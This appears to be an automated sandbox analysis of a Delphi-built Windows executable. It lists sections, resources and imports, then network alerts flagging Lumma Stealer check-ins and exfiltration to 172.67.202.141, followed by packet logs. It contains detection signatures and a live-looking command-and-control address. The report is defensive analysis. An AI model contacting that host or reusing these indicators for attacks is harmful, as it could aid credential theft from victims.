CODE | 0x1000 | 0x62d44 | 0x62e00 | a608b75b620bc9899da54425632a33e5 | False | 0.5154768489254109 | data | 6.498737751055233 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x64000 | 0xe2c | 0x1000 | b9ffc5470506451801f9a3ee8bb378eb | False | 0.396240234375 | data | 3.9376047457579335 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x65000 | 0xa65 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x66000 | 0x1e1c | 0x2000 | 1e4c463a52feae64e21dcc93c56c27fe | False | 0.358642578125 | data | 4.711728774841513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x68000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x69000 | 0x18 | 0x200 | 6eda95e7f89fac29502da04b93c31e66 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x6a000 | 0x66e0 | 0x6800 | 2a6e3bd94e29f2f2a46d5c3d5d03f649 | False | 0.6045297475961539 | data | 6.636864870170326 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x71000 | 0x136e00 | 0x136e00 | ab6dad1a6881f59023e131ce70af5cd4 | False | 0.42046611127864897 | data | 7.584171439487795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x71b58 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | French | France | 0.5714285714285714
RT_CURSOR | 0x71c8c | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0x71dc0 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0x71ef4 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0x72028 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0x7215c | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0x72290 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_CURSOR | 0x723c4 | 0x134 | data | | | 0.38636363636363635
RT_CURSOR | 0x724f8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_ICON | 0x7262c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | French | France | 0.6252665245202559
RT_ICON | 0x734d4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | French | France | 0.769404332129964
RT_ICON | 0x73d7c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | French | France | 0.611271676300578
RT_ICON | 0x742e4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | French | France | 0.3741701244813278
RT_ICON | 0x7688c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | French | France | 0.599671669793621
RT_ICON | 0x77934 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | French | France | 0.725177304964539
RT_STRING | 0x77d9c | 0xec | data | | | 0.5466101694915254
RT_STRING | 0x77e88 | 0x130 | data | | | 0.5493421052631579
RT_STRING | 0x77fb8 | 0x224 | data | | | 0.4306569343065693
RT_STRING | 0x781dc | 0x5cc | data | | | 0.32681940700808626
RT_STRING | 0x787a8 | 0x254 | data | | | 0.5016778523489933
RT_STRING | 0x789fc | 0x128 | data | | | 0.5304054054054054
RT_STRING | 0x78b24 | 0x2d8 | data | | | 0.4532967032967033
RT_STRING | 0x78dfc | 0x4a8 | data | | | 0.3859060402684564
RT_STRING | 0x792a4 | 0x43c | data | | | 0.34501845018450183
RT_STRING | 0x796e0 | 0x314 | data | | | 0.37817258883248733
RT_STRING | 0x799f4 | 0xe4 | data | | | 0.5570175438596491
RT_STRING | 0x79ad8 | 0xb8 | data | | | 0.5543478260869565
RT_STRING | 0x79b90 | 0x384 | data | | | 0.4266666666666667
RT_STRING | 0x79f14 | 0x434 | data | | | 0.370817843866171
RT_STRING | 0x7a348 | 0x368 | data | | | 0.39908256880733944
RT_RCDATA | 0x7a6b0 | 0x10 | data | | | 1.5
RT_RCDATA | 0x7a6c0 | 0x2b0 | data | | | 0.7311046511627907
RT_RCDATA | 0x7a970 | 0x2722 | Delphi compiled form 'TEnvoyerResultatDlg' | | | 0.3609502894789379
RT_RCDATA | 0x7d094 | 0x644e6 | Delphi compiled form 'TEtoileDlg' | | | 0.4514499067795373
RT_RCDATA | 0xe157c | 0x2cb13 | Delphi compiled form 'TPerfCDInfoDlg' | | | 0.19966786664408742
RT_RCDATA | 0x10e090 | 0x12412 | Delphi compiled form 'TPerfCDROMChartDlg' | | | 0.10465427310418617
RT_RCDATA | 0x1204a4 | 0x2d672 | Delphi compiled form 'TPerfCDROMDlg' | | | 0.1919825778351347
RT_RCDATA | 0x14db18 | 0x77f | Delphi compiled form 'TSelectionCDROMDlg' | | | 0.39030745179781134
RT_GROUP_CURSOR | 0x14e298 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | French | France | 1.25
RT_GROUP_CURSOR | 0x14e2ac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e2c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e2d4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x14e2e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e2fc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e310 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e324 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e338 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x14e34c | 0x5a | data | French | France | 0.7333333333333333
                                                                                                                                                RT_VERSION0x14e3a80x360dataFrenchFrance0.4652777777777778
                                                                                                                                                RT_MANIFEST0x14e7080x2bdXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4893009985734665
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpyA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, GetModuleFileNameA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey
kernel32.dll | WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ReadFile, OutputDebugStringA, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
gdi32.dll | UnrealizeObject, TextOutA, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetBrushOrgEx, GetBkColor, GetBitmapBits, ExcludeClipRect, EnumFontsA, EnumFontFamiliesExA, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt, Arc
user32.dll | WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadIconA, LoadCursorA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollPos, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIcon, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
comctl32.dll | ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteA
Language of compilation system | Country where language is spoken | Map
French | France |
English | United States |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-28T16:12:23.295506+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49805 | 172.67.202.141 | 443 | TCP
2025-01-28T16:12:35.235027+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49805 | 172.67.202.141 | 443 | TCP
2025-01-28T16:12:35.235027+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49805 | 172.67.202.141 | 443 | TCP
2025-01-28T16:12:35.723772+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49882 | 172.67.202.141 | 443 | TCP
2025-01-28T16:12:36.218632+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.9 | 49882 | 172.67.202.141 | 443 | TCP
2025-01-28T16:12:36.218632+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49882 | 172.67.202.141 | 443 | TCP
2025-01-28T16:12:37.124523+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49891 | 172.67.202.141 | 443 | TCP
2025-01-28T16:12:49.974505+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49224 | 172.67.202.141 | 443 | TCP
2025-01-28T16:13:02.961072+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49233 | 172.67.202.141 | 443 | TCP
2025-01-28T16:13:04.118061+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49233 | 172.67.202.141 | 443 | TCP
2025-01-28T16:13:05.572469+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49234 | 172.67.202.141 | 443 | TCP
2025-01-28T16:13:23.199997+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49235 | 172.67.202.141 | 443 | TCP
2025-01-28T16:13:36.459364+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49236 | 172.67.202.141 | 443 | TCP
2025-01-28T16:13:37.219436+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49236 | 172.67.202.141 | 443 | TCP
2025-01-28T16:13:37.708029+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49237 | 104.26.3.16 | 443 | TCP
• Total Packets: 121
• 443 (HTTPS)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2025 16:12:22.810014009 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:22.810067892 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:22.810142040 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:22.817190886 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:22.817233086 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:23.294924021 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:23.295506001 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:23.299551964 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:23.299576998 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:23.299958944 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:23.348419905 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:23.496938944 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:23.496964931 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:23.497101068 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.235045910 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.235146046 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.235198021 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.238527060 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.238545895 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.238558054 CET | 49805 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.238564014 CET | 443 | 49805 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.262629986 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.262670040 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.262723923 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.263284922 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.263304949 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.723675013 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.723772049 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.729639053 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.729651928 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.729928970 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:35.731133938 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.731153965 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:35.731208086 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.218652964 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.218714952 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.218748093 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.218753099 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.218763113 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.218803883 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.218812943 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.219469070 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.219507933 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.219513893 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.219520092 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.219563007 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.219650030 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.219923019 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.219968081 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.219974995 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.223762989 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.223810911 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.223819017 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.270308018 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.304997921 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.305063963 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.305105925 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.305114985 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.305126905 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.305164099 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.305172920 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.305188894 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.305226088 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.306252003 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.306266069 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.306281090 CET | 49882 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.306287050 CET | 443 | 49882 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.643520117 CET | 49891 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.643556118 CET | 443 | 49891 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:36.643616915 CET | 49891 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.644150972 CET | 49891 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:36.644170046 CET | 443 | 49891 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:37.124456882 CET | 443 | 49891 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:37.124522924 CET | 49891 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:37.125662088 CET | 49891 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:37.125673056 CET | 443 | 49891 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:37.126002073 CET | 443 | 49891 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:37.127130985 CET | 49891 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:37.127275944 CET | 49891 | 443 | 192.168.2.9 | 172.67.202.141
Jan 28, 2025 16:12:37.127306938 CET | 443 | 49891 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:40.185492039 CET | 49161 | 53 | 192.168.2.9 | 162.159.36.2
Jan 28, 2025 16:12:40.190345049 CET | 53 | 49161 | 162.159.36.2 | 192.168.2.9
Jan 28, 2025 16:12:40.193181992 CET | 49161 | 53 | 192.168.2.9 | 162.159.36.2
Jan 28, 2025 16:12:40.197964907 CET | 53 | 49161 | 162.159.36.2 | 192.168.2.9
Jan 28, 2025 16:12:40.660278082 CET | 49161 | 53 | 192.168.2.9 | 162.159.36.2
Jan 28, 2025 16:12:40.665208101 CET | 53 | 49161 | 162.159.36.2 | 192.168.2.9
Jan 28, 2025 16:12:40.665256977 CET | 49161 | 53 | 192.168.2.9 | 162.159.36.2
Jan 28, 2025 16:12:49.270206928 CET | 443 | 49891 | 172.67.202.141 | 192.168.2.9
Jan 28, 2025 16:12:49.270323992 CET | 443 | 49891 | 172.67.202.141 | 192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.270376921 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.270710945 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.270724058 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.489547968 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.489579916 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.489660025 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.490026951 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.490039110 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.974395037 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.974504948 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.975740910 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.975750923 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.976140022 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.977869987 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.977998972 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.978034019 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.978092909 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:50.019335985 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:01.975130081 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:01.975397110 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:01.975507021 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:01.975662947 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:01.975686073 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.479950905 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.480006933 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.480103016 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.480361938 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.480381966 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.960997105 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.961071968 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.962313890 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.962322950 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.962563038 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.963694096 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.963814020 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.963851929 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.963865042 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.963946104 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.963958025 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:04.118094921 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:04.118201971 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:04.118272066 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:04.118771076 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:04.118789911 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.105122089 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.105170965 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.105242014 CET49234443192.168.2.9172.67.202.141
